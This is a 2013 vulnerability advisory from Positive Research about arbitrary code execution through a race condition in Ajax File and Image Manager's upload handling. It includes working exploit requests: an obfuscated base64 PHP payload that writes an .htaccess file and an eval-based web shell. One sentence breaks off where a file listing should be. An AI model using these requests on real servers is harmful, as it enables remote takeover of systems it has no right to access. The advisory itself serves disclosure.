PT-2013-41: Arbitrary Code Execution in Ajax File and Image Manager Vulnerable softwareAjax File and Image Manager Version: 1.1 and earlierLink: http://www.phpletter.com/DOWNLOAD/Severity levelSeverity level: High Impact: Arbitrary Code Execution Access Vector: Remote CVSS v2: Base Score: 10 Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)CVE: not assignedSoftware descriptionAjax file and Image Manager is an open source file manager, which employs Ajax and PHP. It can be used as a standalone web application, as well as the TinyMCE/FCKeditor plugin.Vulnerability descriptionThe specialists of the Positive Research center have detected "Arbitrary Code Execution" vulnerability in Ajax File and Image Manager.Due to incorrect application architecture, validation of file extension is implemented after uploading file. Uploaded file will subsequently be removed if its extension is not allowed by whitelist. Thus, you can refer to the uploaded file before its removal, resulting in arbitrary code execution.Vulnerability exploitation example:Send the following requests simultaneously:1)-----------------------------307211690811 Content-Disposition: form-data; name="file"; filename="1.php" Content-Type: image/jpeg<?php eval(base64_decode("JGZwID0gZm9wZW4oIi5odGFjY2VzcyIsICJ3Iik7CiRodGFjY2VzcyA9ICc8RmlsZXNNYXRjaCAi LihwaHApJCI+CkFsbG93IGZyb20gYWxsCjwvRmlsZXNtYXRjaD4nOwokdGVzdCA9IGZ3cml0ZSgk ZnAsICRodGFjY2Vzcyk7CmZjbG9zZSgkZnApOwojaWYoZmlsZV9leGlzdHMoIjIucGhwIikpIHtk aWUoKTt9CiRmcDEgPSBmb3BlbigiMi5waHAiLCAidyIpOwokY29kZSA9ICc8P3BocCBldmFsKCRf UkVRVUVTVFtjXSk7ID8+JzsKJHRlc3QgPSBmd3JpdGUoJGZwMSwgJGNvZGUpOwpmY2xvc2UoJGZw MSk7")); ?> -----------------------------307211690811—-----------------------------307211690811 Content-Disposition: form-data; name="file"; filename=".htaccess" Content-Type: image/jpeg<FilesMatch ".(php)$"> Allow from all </FilesMatch> -----------------------------307211690811—This will also create the following files in the /targethost/images/banner directory: .htaccess with How to fixNo solutionAdvisory status 20.06.2013 - Vendor gets vulnerability details 04.09.2013 - Vulnerability details were sent to CERT 17.09.2013 - Public disclosureCreditsThe vulnerability was detected by Ilya Krupenko, Positive Research Center (Positive Technologies Company)Referenceshttp://en.securitylab.ru/lab/PT-2013-41 Reports on the vulnerabilities previously discovered by Positive Research:http://www.ptsecurity.com/research/advisory/ http://en.securitylab.ru/lab/